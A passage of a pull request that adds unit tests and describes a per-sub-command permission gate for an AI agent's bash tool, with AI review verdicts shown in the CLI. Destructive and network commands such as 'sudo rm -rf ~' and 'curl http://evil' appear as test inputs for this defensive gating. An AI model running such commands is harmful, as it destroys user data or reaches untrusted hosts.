+        await hooks.on_tool_start(self._ctx("cargo build"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        assert "**Reason:**" in event.content
+        assert "sub-commands require confirmation" not in event.content
+        assert event.choices["a"] == "Allow 'cargo build' (session)"
+
+    @pytest.mark.asyncio
+    async def test_session_choice_approves_every_sub_command(self, mock_broker):
+        hooks, manager = self._make_hooks(mock_broker, {"allow": ["git fetch"]})
+        mock_broker.request = AsyncMock(return_value=[["a"]])
+
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && cargo test"), MagicMock(), self._tool())
+
+        assert manager._session_approvals.get("bash_tools.bash::rm") is True
+        assert manager._session_approvals.get("bash_tools.bash::cargo test") is True
+
+        # Re-running the same chain, and each sub-command on its own, is silent.
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && cargo test"), MagicMock(), self._tool())
+        await hooks.on_tool_start(self._ctx("cargo test --release"), MagicMock(), self._tool())
+        assert mock_broker.request.await_count == 1
+
+    @pytest.mark.asyncio
+    async def test_session_approval_does_not_cover_an_unreviewed_sub_command(self, mock_broker):
+        """Approving ``a && b`` must not green-light ``a && c``."""
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git fetch"]})
+        mock_broker.request = AsyncMock(return_value=[["a"]])
+
+        await hooks.on_tool_start(self._ctx("rm -rf build && cargo test"), MagicMock(), self._tool())
+        await hooks.on_tool_start(self._ctx("rm -rf build && curl http://evil"), MagicMock(), self._tool())
+
+        assert mock_broker.request.await_count == 2
+
+    @pytest.mark.asyncio
+    async def test_broad_session_approval_still_covers_a_whole_chain(self, mock_broker):
+        """A deliberate wide grant (``bash_tools.bash``) is honored as before.
+
+        Per-sub-command keys tightened the *narrow* path; they must not break
+        the coarse approval a legacy prompt may already have recorded.
+        """
+        hooks, manager = self._make_hooks(mock_broker, {"allow": ["git log:*"]})
+        manager.approve_for_session("bash_tools", "bash")
+
+        await hooks.on_tool_start(self._ctx("rm -rf build && cargo test"), MagicMock(), self._tool())
+
+        mock_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_safety_forced_session_approval_is_scoped_to_the_exact_command(self, mock_broker):
+        """A safety-ceiling bucket (``sudo``) describes nothing about what runs.
+
+        Regression guard: keying the approval on the bucket let ``sudo ls``
+        green-light ``sudo rm -rf ~`` for the rest of the session.
+        """
+        hooks, manager = self._make_hooks(mock_broker, {"allow": ["git log:*"]})
+        mock_broker.request = AsyncMock(return_value=[["a"]])
+
+        await hooks.on_tool_start(self._ctx("sudo ls"), MagicMock(), self._tool())
+        assert manager._session_approvals.get("bash_tools.bash::sudo") is None
+        assert manager._session_approvals.get("bash_tools.bash::exact:sudo ls") is True
+
+        await hooks.on_tool_start(self._ctx("sudo rm -rf /tmp/x"), MagicMock(), self._tool())
+        assert mock_broker.request.await_count == 2
+
+    @pytest.mark.asyncio
+    async def test_project_choice_persists_one_pattern_per_sub_command(self, mock_broker, tmp_path):
+        from datus.configuration.project_config import load_project_override
+
+        hooks, manager = self._make_hooks(mock_broker, {"allow": ["git fetch"]}, project_root=str(tmp_path))
+        mock_broker.request = AsyncMock(return_value=[["p"]])
+
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && cargo test"), MagicMock(), self._tool())
+
+        override = load_project_override(str(tmp_path))
+        # Both patterns land on disk; the writer's insert-after-key placement
+        # decides their order, so compare as a set.
+        assert set(override.bash_allow) == {"rm:*", "cargo test:*"}
+        assert len(override.bash_allow) == 2
+        for pattern in ("rm:*", "cargo test:*"):
+            assert pattern in manager.global_config.bash_commands.allow
+
+    @pytest.mark.asyncio
+    async def test_project_choice_makes_the_chain_idempotent_across_sessions(self, mock_broker, tmp_path):
+        """A fresh manager loading the persisted grants must not re-prompt.
+
+        Previously only the representative sub-command was persisted, so each
+        later session re-prompted once per remaining sub-command.
+        """
+        from datus.configuration.project_config import load_project_override
+
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git fetch"]}, project_root=str(tmp_path))
+        mock_broker.request = AsyncMock(return_value=[["p"]])
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && cargo test"), MagicMock(), self._tool())
+
+        # Simulate a restart: rebuild from the persisted project override only.
+        persisted = load_project_override(str(tmp_path)).bash_allow
+        fresh_broker = MagicMock()
+        fresh_broker.request = AsyncMock(return_value=[["n"]])
+        fresh_hooks, _ = self._make_hooks(
+            fresh_broker,
+            {"allow": ["git fetch", *persisted]},
+            project_root=str(tmp_path),
+        )
+
+        await fresh_hooks.on_tool_start(self._ctx("git fetch && rm -rf build && cargo test"), MagicMock(), self._tool())
+        fresh_broker.request.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_user_authored_ask_sub_command_withholds_project_choice(self, mock_broker):
+        """One user-authored ask rule in the chain removes 'p' for all of it."""
+        hooks, _ = self._make_hooks(mock_broker, {"allow": ["git fetch"], "ask": ["npm:*"]})
+        mock_broker.request = AsyncMock(return_value=[["y"]])
+
+        await hooks.on_tool_start(self._ctx("git fetch && rm -rf build && npm ci"), MagicMock(), self._tool())
+
+        event = mock_broker.request.await_args.args[0][0]
+        assert "p" not in event.choices
 
 
 class TestPluginCliBashPermission:

--- a/tests/unit_tests/tools/permission/test_review_registry.py
+++ b/tests/unit_tests/tools/permission/test_review_registry.py
@@ -1,0 +1,183 @@
+# Copyright 2025-present DatusAI, Inc.
+# Licensed under the Apache License, Version 2.0.
+# See http://www.apache.org/licenses/LICENSE-2.0 for details.
+
+"""Hand-off of AI review verdicts from the permission gate to tool actions."""
+
+import pytest
+
+from datus.schemas.action_history import ActionHistory, ActionRole, ActionStatus
+from datus.tools.permission import review_registry as rr
+
+
+@pytest.fixture(autouse=True)
+def _clean_registry():
+    rr.clear()
+    yield
+    rr.clear()
+
+
+def verdict(outcome="auto_allowed", **overrides):
+    payload = {
+        "outcome": outcome,
+        "decision": "allow",
+        "risk_level": "low",
+        "user_authorization": "medium",
+        "confidence": 0.9,
+        "rationale": "scoped to the workspace",
+    }
+    payload.update(overrides)
+    return payload
+
+
+def tool_action(action_id, output=None, status=ActionStatus.SUCCESS, role=ActionRole.TOOL):
+    return ActionHistory(
+        action_id=action_id,
+        role=role,
+        messages="Tool call: bash",
+        action_type="bash",
+        input={"function_name": "bash"},
+        output=output,
+        status=status,
+    )
+
+
+class TestRecordAndTake:
+    def test_round_trip(self):
+        rr.record("c1", verdict())
+        assert rr.take("c1")["rationale"] == "scoped to the workspace"
+
+    def test_take_consumes(self):
+        rr.record("c1", verdict())
+        rr.take("c1")
+        assert rr.take("c1") is None
+
+    def test_unknown_call_id(self):
+        assert rr.take("nope") is None
+
+    @pytest.mark.parametrize("call_id,payload", [(None, {"a": 1}), ("c1", None), ("", {"a": 1}), ("c1", {})])
+    def test_missing_inputs_are_noops(self, call_id, payload):
+        rr.record(call_id, payload)
+        assert rr.take(call_id or "c1") is None
+
+    def test_rerecord_overwrites(self):
+        """The gate refines outcome after the user answers a prompt."""
+        rr.record("c1", verdict("auto_allowed"))
+        rr.record("c1", verdict("user_approved"))
+        assert rr.take("c1")["outcome"] == "user_approved"
+
+    def test_bounded_eviction_drops_oldest(self):
+        for i in range(rr._MAX_PENDING + 5):
+            rr.record(f"c{i}", verdict())
+        assert rr.take("c0") is None
+        assert rr.take("c4") is None
+        assert rr.take(f"c{rr._MAX_PENDING + 4}") == verdict()
+
+
+class TestCallIdOf:
+    @pytest.mark.parametrize(
+        "action_id,expected",
+        [
+            ("complete_call_123", "call_123"),
+            ("call_123", "call_123"),  # in-flight frame uses the bare id
+            ("complete_complete_x", "complete_x"),  # strip only one prefix
+            (None, None),
+            ("", None),
+        ],
+    )
+    def test_recovers_call_id(self, action_id, expected):
+        assert rr.call_id_of(action_id) == expected
+
+
+class TestStamp:
+    def test_adds_key_to_dict_output(self):
+        rr.record("c1", verdict())
+        out = rr.stamp({"success": True}, "c1")
+        assert out["success"] is True
+        assert out[rr.PERMISSION_REVIEW_OUTPUT_KEY]["decision"] == "allow"
+
+    def test_no_review_leaves_output_untouched(self):
+        original = {"success": True}
+        assert rr.stamp(original, "c1") is original
+        assert rr.PERMISSION_REVIEW_OUTPUT_KEY not in original
+
+    def test_non_dict_output_is_wrapped_not_dropped(self):
+        rr.record("c1", verdict())
+        out = rr.stamp("raw text", "c1")
+        assert out["result"] == "raw text"
+        assert out[rr.PERMISSION_REVIEW_OUTPUT_KEY]["decision"] == "allow"
+
+
+class TestEnrichAction:
+    def test_stamps_completed_tool_action(self):
+        rr.record("c1", verdict())
+        action = tool_action("complete_c1", output={"success": True})
+        rr.enrich_action(action)
+        assert action.output[rr.PERMISSION_REVIEW_OUTPUT_KEY]["risk_level"] == "low"
+
+    def test_failed_tool_action_is_also_stamped(self):
+        """A reviewed command that then failed still shows what authorised it."""
+        rr.record("c1", verdict())
+        action = tool_action("complete_c1", output={"success": False}, status=ActionStatus.FAILED)
+        rr.enrich_action(action)
+        assert rr.PERMISSION_REVIEW_OUTPUT_KEY in action.output
+
+    def test_processing_frame_does_not_consume_the_entry(self):
+        """The in-flight frame is emitted first and shares the call id.
+
+        Consuming there would leave the completed action — the one that
+        persists and gets replayed on ctrl+o — without the verdict.
+        """
+        rr.record("c1", verdict())
+        rr.enrich_action(tool_action("c1", status=ActionStatus.PROCESSING))
+        completed = tool_action("complete_c1", output={"success": True})
+        rr.enrich_action(completed)
+        assert rr.PERMISSION_REVIEW_OUTPUT_KEY in completed.output
+
+    def test_non_tool_action_ignored(self):
+        rr.record("c1", verdict())
+        action = tool_action("complete_c1", output={"x": 1}, role=ActionRole.ASSISTANT)
+        rr.enrich_action(action)
+        assert rr.PERMISSION_REVIEW_OUTPUT_KEY not in action.output
+
+    def test_unreviewed_action_keeps_none_output(self):
+        """A miss must not rewrite ``output``; ``None`` stays ``None``."""
+        action = tool_action("complete_c1", output=None)
+        rr.enrich_action(action)
+        assert action.output is None
+
+    def test_already_stamped_action_is_left_alone(self):
+        rr.record("c1", verdict("user_approved"))
+        action = tool_action("complete_c1", output={rr.PERMISSION_REVIEW_OUTPUT_KEY: {"outcome": "original"}})
+        rr.enrich_action(action)
+        assert action.output[rr.PERMISSION_REVIEW_OUTPUT_KEY]["outcome"] == "original"
+
+
+class TestActionHistoryManagerIntegration:
+    def test_add_action_applies_the_registered_enricher(self):
+        """Importing the permission package wires the enricher for every model."""
+        import datus.tools.permission  # noqa: F401 - registration side effect
+        from datus.schemas.action_history import ActionHistoryManager
+
+        rr.record("c1", verdict())
+        manager = ActionHistoryManager()
+        action = tool_action("complete_c1", output={"success": True})
+        manager.add_action(action)
+
+        assert action.output[rr.PERMISSION_REVIEW_OUTPUT_KEY]["confidence"] == 0.9
+
+    def test_a_failing_enricher_never_drops_the_action(self):
+        from datus.schemas.action_history import ActionHistoryManager, register_action_enricher
+
+        def boom(_action):
+            raise RuntimeError("enricher exploded")
+
+        register_action_enricher(boom)
+        try:
+            manager = ActionHistoryManager()
+            manager.add_action(tool_action("complete_c9", output={"success": True}))
+            assert len(manager.actions) == 1
+        finally:
+            from datus.schemas import action_history
+
+            action_history._ACTION_ENRICHERS.remove(boom)

--- a/tests/unit_tests/utils/test_exceptions.py
+++ b/tests/unit_tests/utils/test_exceptions.py
@@ -232,6 +232,69 @@ class TestDatusExceptionBuildMsg:
         assert isinstance(ex, DatusException)
 
 
+class TestBuildMsgKeepsUnconsumedArgs:
+    """A description without a matching placeholder must not eat the args.
+
+    Regression: ``ErrorCode.MODEL_INVALID_RESPONSE``'s description carries no
+    ``{error_detail}`` field, so ``desc.format(error_detail=<real cause>)``
+    returned the template unchanged and silently discarded the only diagnostic
+    the caller passed. Two very different model failures (a provider 400 and an
+    empty/unparseable response) became byte-identical in the log.
+    """
+
+    def test_arg_without_placeholder_is_appended(self):
+        ex = DatusException(
+            ErrorCode.MODEL_INVALID_RESPONSE,
+            message_args={"error_detail": "Invalid JSON from Codex: line 1 column 1"},
+        )
+        assert "Invalid JSON from Codex: line 1 column 1" in str(ex)
+        assert ErrorCode.MODEL_INVALID_RESPONSE.desc in str(ex)
+
+    def test_consumed_placeholder_is_not_duplicated(self):
+        ex = DatusException(ErrorCode.COMMON_FIELD_REQUIRED, message_args={"field_name": "username"})
+        assert str(ex).count("username") == 1
+
+    def test_partially_consumed_args_append_only_the_remainder(self):
+        ex = DatusException(
+            ErrorCode.COMMON_FIELD_REQUIRED,
+            message_args={"field_name": "username", "extra_hint": "from the CLI flag"},
+        )
+        assert str(ex).count("username") == 1
+        assert "extra_hint=from the CLI flag" in str(ex)
+
+    def test_missing_placeholder_arg_still_falls_back(self):
+        """A template whose placeholder has no arg keeps the old args= dump."""
+        ex = DatusException(ErrorCode.COMMON_FIELD_REQUIRED, message_args={"unrelated": "value"})
+        assert "unrelated" in str(ex)
+
+    def test_explicit_message_still_wins_over_args(self):
+        ex = DatusException(
+            ErrorCode.MODEL_INVALID_RESPONSE,
+            message="Codex generate_with_json_output failed",
+            message_args={"error_detail": "dropped"},
+        )
+        assert "Codex generate_with_json_output failed" in str(ex)
+        assert "dropped" not in str(ex)
+
+    def test_invalid_response_desc_does_not_claim_http_400(self):
+        """The code covers unparseable responses too, so the description must
+        not name a status the failure may not have had."""
+        assert "400" not in ErrorCode.MODEL_INVALID_RESPONSE.desc
+
+    @pytest.mark.parametrize(
+        "template,expected",
+        [
+            ("no fields here", set()),
+            ("{detail}", {"detail"}),
+            ("{err.args[0]} and {other}", {"err", "other"}),
+            ("{items[0]}", {"items"}),
+            ("{a} {a}", {"a"}),
+        ],
+    )
+    def test_placeholder_extraction(self, template, expected):
+        assert DatusException._desc_placeholders(template) == expected
+
+
 class TestSetupExceptionHandler:
     """Tests for setup_exception_handler (lines 178-219)."""
 


### PR DESCRIPTION
## Why

Two gaps in how the CLI reports what it is about to run and what authorised it.

**1. Bash permissions were judged per-command, not per-sub-command.**
Static rules only decomposed pure pipelines; `&&`, `||` and `;` hit the safety
ceiling as one opaque string. Even for pipelines the ASK aggregate kept a single
representative segment, so:

- the prompt named one sub-command while several needed approval;
- "allow (session)" covered one bucket;
- "allow (project)" persisted one pattern, so re-running the same chain in a
  later session re-prompted once per remaining sub-command — never idempotent.

The split also surfaced two defects worth fixing on their own:

- The session "always allow" branch had no `safety_forced` guard. Approving
  `sudo ls` cached the bucket `sudo`, which then auto-ran `sudo rm -rf ~` for the
  rest of the session — the bucket does not describe what actually executes.
- Loops, conditionals and subshells segment into fragments (`do rm $f`) that
  could be approved, and persisted, as ordinary commands.

**2. An AI review that passed was invisible.**
Auto mode reviews every bash/SQL action left at ASK, but only a flagged verdict
was ever shown — it reached the confirmation prompt and vanished with it. An
auto-allowed action ran silently, so the user could not tell a review had
happened, what it concluded, or why. `AutoReviewVerdict.rationale` already
existed; nothing carried it to the CLI.

**3. Three model-backend defects found while verifying #2 in the real CLI.**
An auto-mode review reported `unavailable` instead of a verdict. Each cause is
independent and each one breaks a whole backend:

- **Codex discarded a complete response.** Against a ChatGPT-account endpoint the
  terminal `response.completed` event arrives with `output_text == ""` and
  `output == []` *after* the model streamed the full answer over
  `response.output_text.delta`. `_consume_stream_text` returned that empty value
  and threw away the deltas it had already collected, so every non-streaming
  Codex call got `""` and `generate_with_json_output` raised a JSONDecodeError.
  With Codex active this made every reviewable action fail closed — auto mode
  silently degraded to ask-everything.
- **The claude-\*-5 family was unusable.** Those models reject the request with
  ``` `temperature` is deprecated for this model. ``` but the non-reasoning
  default of 0.7 was always sent, so `generate` *and*
  `generate_with_json_output` failed for every prompt, not just reviews.
- **Error causes were silently dropped**, which is why the two bugs above looked
  identical in the log. `DatusException.build_msg` formats the code description
  with `message_args`, but a description without a matching placeholder returns
  unchanged — `MODEL_INVALID_RESPONSE.desc.format(error_detail=<real cause>)`
  discarded the only diagnostic the caller passed. The existing `except KeyError`
  fallback covers the opposite case (a placeholder with no arg) and never fired.
  The two `_with_retry` raise sites logged the upstream provider message but
  raised without it, so whoever catches the exception saw only generic text.

## Solution

**Per-sub-command bash permissions** (`bash_rules.py`, `permission_hooks.py`)

- New `split_command_chain` splits on top-level unquoted `|`, `&&`, `||`, `;`.
  `split_pipeline` keeps its pipe-only semantics: `BashTool.allowed_patterns`
  (the skills whitelist) is a separate trust boundary and stays narrow.
- `BashRuleDecision.segment_ask_patterns` becomes `ask_segments`, a tuple of
  `BashSegmentDecision` carrying each sub-command's text, bucket and provenance.
  Populated for single commands too, so the hook has one code path.
- `safety_forced` no longer short-circuits aggregation, so the prompt can list
  every sub-command even when one hits the ceiling.
- The prompt lists all sub-commands needing approval; session and project grants
  cover all of them, making a chain approval idempotent across sessions.
- Safety-forced sub-commands key their session grant on the verbatim command
  rather than the bucket, and the choice label says so.
- A shell-keyword / grouping guard forces compound constructs (`for`, `do`,
  `(`, `{`) to the safety ceiling instead of letting fragments be approved.

**AI review on the tool call** (`review_registry.py`, `tool_content.py`, `renderers.py`)

- The gate publishes each verdict keyed by the SDK's `tool_call_id`; the
  completed tool action for that call is stamped with it and the CLI renders one
  line above the result:

  ```
  ⏺ 🔧 bash("git fetch && npm ci")
    └─ AI review ✓ passed · low risk · conf 0.92 · dependency install, scoped to the workspace, reversible
    └─ ✓ added 42 packages in 2s · 2.3s
  ```

- `outcome` distinguishes a verdict the reviewer resolved from one a person
  overrode, so an approved-despite-flagged run never reads as a clean pass. A
  disabled reviewer publishes nothing rather than claiming a review occurred.
  `ctrl+o` shows the untruncated rationale.
- The hand-off rides `ActionHistoryManager.add_action` — the one point every
  model implementation funnels through — via a registered enricher, so
  `datus.schemas` stays unaware of the permission layer and the verdict lands in
  the persisted action rather than in display-only state. Bash mode builds its
  actions directly and stamps them itself.

### Tradeoffs

- Splitting on `&&`/`||`/`;` relaxes the previous blanket safety ceiling: a chain
  whose every sub-command is allow-listed now auto-runs. This is the point of the
  change, and deny rules, the per-segment ceiling and the compound-construct
  guard all still apply. `$()`, backticks, redirection, background `&`, `|&` and
  newlines remain whole-command asks.
- The review row is one line by design; a long rationale is middle-truncated in
  compact mode rather than wrapping, with the full text behind `ctrl+o`.

### Behaviour changes worth calling out

- `git status && rm -rf /`, `ls; rm x`, `ls || rm x` are no longer SAFETY asks;
  each sub-command is judged on its own.
- Safety-forced session approvals narrow from bucket to verbatim command.
- `BashRuleDecision.segment_ask_patterns` is replaced by `ask_segments`.

### Model-backend fixes

- `codex_model._consume_stream_text` prefers the accumulated deltas when the
  terminal event carries no text. Verified against `codex/gpt-5.6-sol`: the
  discarded deltas held a well-formed verdict.
- `temperature` now rides the same routed-provider gate `top_p` already used, so
  the two sampling knobs are symmetric: **neither is ever sent to Anthropic**,
  which applies its own defaults. Gating on the family rather than a per-model
  flag means a newly released Claude model works on day one instead of 400ing
  until the catalog catches up. The two native Anthropic SDK call sites in
  `ClaudeModel` stop forwarding it too — they defaulted to
  `anthropic.NOT_GIVEN`, so the common path was fine, but an explicit
  caller value would fail the request on a 5-family model rather than tune it.
  Verified deprecated on `claude-sonnet-5` and `claude-opus-5`, and that
  `claude-sonnet-4-6` keeps working; both 5-family models are added to the
  provider's `models` list, without which the fix is unreachable via `/model`.

  *Behaviour change:* a `temperature` in kwargs or model_config is now ignored
  for Claude models that previously honoured it (the 4.x family). That is the
  point — the value cannot be expressed to the newer models at all, and
  silently dropping it beats a hard 400.
- `build_msg` appends args the description did not consume; the `_with_retry`
  sites carry the upstream text on the exception as well as the log; and
  `MODEL_INVALID_RESPONSE`'s description no longer claims "HTTP 400" — it covers
  unparseable and empty responses too, which is exactly how both bugs above
  disguised themselves.

Verified end-to-end on the original failing input (`curl www.google.com`, auto
profile, Codex reviewer): previously always fail-closed, now auto-allowed with
the verdict published to the tool action. `claude/claude-sonnet-5` and
`claude/claude-sonnet-4-6` both return verdicts.

## Test Cases

No integration/nightly tests: both changes are deterministic and fully coverable
at the unit tier — the permission gate is exercised through `on_tool_start` with
a stub reviewer and broker, and the renderers are pure functions over
`ActionHistory`. Neither touches a live LLM, database or network.

Unit tests added/updated (mirroring source paths per CLAUDE.md):

- `tests/unit_tests/tools/permission/test_bash_rules.py` — `TestCommandChainSplitting`
  (quoted/escaped separators, `find -exec ... \;`, `|&`, bare `&`, empty segments,
  unbalanced quotes; plus a regression that `split_pipeline` was not widened),
  `TestChainEvaluation` (all-allow auto-run, deny blocks the chain, every non-allow
  sub-command reported in order, repeated sub-commands not deduped away,
  safety-forced still lists its siblings), compound-construct guard.
- `tests/unit_tests/tools/permission/test_permission_hooks.py` —
  `TestBashChainedCommandPrompt`: prompt body lists every sub-command; choice
  labels name each bucket/pattern and degrade to a count past three; session
  approval covers all sub-commands and does *not* green-light a chain containing
  an unreviewed one; project choice persists one pattern per sub-command and is
  idempotent across a simulated restart; safety-forced session grants do not leak
  across commands; backtick-bearing sub-commands stay a valid code span.
- `tests/unit_tests/tools/permission/test_review_registry.py` (new) — record/take/
  eviction, `call_id` recovery, stamping (including non-dict output), enricher
  behaviour (PROCESSING frame must not consume the entry; a failing enricher never
  drops the action).
- `tests/unit_tests/tools/permission/test_auto_reviewer.py` —
  `TestReviewHandoffToToolAction`: auto-allowed, user-override, denied,
  inconclusive, review-disabled and statically-allowed cases; per-call keying.
  `test_safety_forced_command_is_reviewed` now uses `echo $(id)` because
  `git status && git diff` is statically allow-listed under the new splitting, and
  a companion test pins that it never reaches the reviewer.
- `tests/unit_tests/cli/action_display/test_tool_content.py` /
  `test_renderers.py` — review line formatting (passed / flagged / unavailable,
  partial payloads, malformed input, compact truncation vs verbose full text) and
  that the review row does not disturb bash's own line/overflow accounting.
- `tests/unit_tests/tools/func_tool/test_bash_tool.py` — regression that the
  execution-layer whitelist still rejects `&&`/`||`/`;`/`&`.

Verification on this branch:

- permission + action_display + bash_mode + schemas suites: **1773 passed**
- `diff-cover` vs `datus/main`: **100%** of newly added lines
- `ci/audit_tests.py`: **P0=0, P1=0**
- `ci/run-pr-tests.py`: failures/errors identical to `datus/main` baseline (a
  local-environment issue in the acceptance harness, unrelated to this PR)
- Full unit suite: the only failures are in `test_explorer_service.py` and
  `test_osi_authoring_templates.py`, which fail identically on a clean
  `datus/main` checkout

Model-backend fixes:

- `tests/unit_tests/models/test_codex_model.py` — `TestConsumeStreamText`: empty
  / missing / absent-response terminal events fall back to deltas, a non-empty
  terminal value still wins, no-deltas and no-terminal-event edges, plus an
  end-to-end `generate_with_json_output` that survives an empty terminal event.
- `tests/unit_tests/models/test_openai_compatible.py` —
  `TestClaudeTemperatureSuppression`: the default, an explicit kwarg and a
  model_config value are all suppressed for Claude-routed requests, across
  sonnet-5 / opus-5 / sonnet-4-6 / 3-7-sonnet; other providers keep both the
  default and an explicit value; the catalog exposes the 5-family models. The
  pre-existing `test_top_p_suppressed_..._default_path` assertion that
  `temperature == 0.7` for Claude is updated — its premise ("temperature is fine
  alone") is exactly what the 5 family falsified.
- `tests/unit_tests/models/test_openai_compatible_retry.py` —
  `TestRetryExceptionCarriesUpstream`: sync and async raise sites put the
  upstream cause on the exception while keeping the error code.
- `tests/unit_tests/utils/test_exceptions.py` — `TestBuildMsgKeepsUnconsumedArgs`:
  unconsumed args appended, consumed placeholders not duplicated, partial
  consumption, the missing-arg fallback preserved, explicit message still wins,
  the description no longer names HTTP 400, and placeholder extraction across
  `{a}` / `{err.args[0]}` / `{items[0]}` forms.

## Backport

<!-- Auto-generated below by .github/workflows/sync-backport-checklist.yml. Tick the release branches to backport this PR to after merge. -->

- [ ] release/0.3.1
- [ ] release/0.3.2
- [ ] release/0.3.3
- [ ] release/0.3.4
- [ ] release/0.3.5
- [ ] release/0.3.6
- [ ] release/0.3.7
- [ ] release/0.3.8
- [ ] release/0.3.9
- [ ] release/0.4.0
## Summary by CodeRabbit

- **New Features**
  - Permission-review verdicts now appear in CLI tool output, including risk, confidence, rationale, and whether approval was automatic or user-granted.
  - Bash command chains are evaluated and approved per subcommand, with clearer prompts and more precise session or project approvals.
- **Bug Fixes**
  - Improved handling and safety enforcement for chained commands, background processes, loops, subshells, and other compound shell constructs.
  - Review results now remain associated with the correct tool execution.
- **Documentation**
  - Expanded permission guidance for Bash wrappers, chaining, metacharacters, and safety behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

- **New Features**
  - Permission-review verdicts now appear in CLI tool output with risk, confidence, rationale, and approval status.
  - Bash command chains are evaluated and approved per subcommand, with clearer prompts and precise session or project approvals.
  - Added Claude Sonnet 5 and Claude Opus 5 model options.
- **Bug Fixes**
  - Preserved streamed responses when terminal output is empty.
  - Retry errors now include upstream details.
  - Improved invalid-request and unusable-response messages.
  - Claude requests now use provider defaults and correctly process multiple text blocks.
- **Documentation**
  - Expanded Bash permission guidance and safety behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->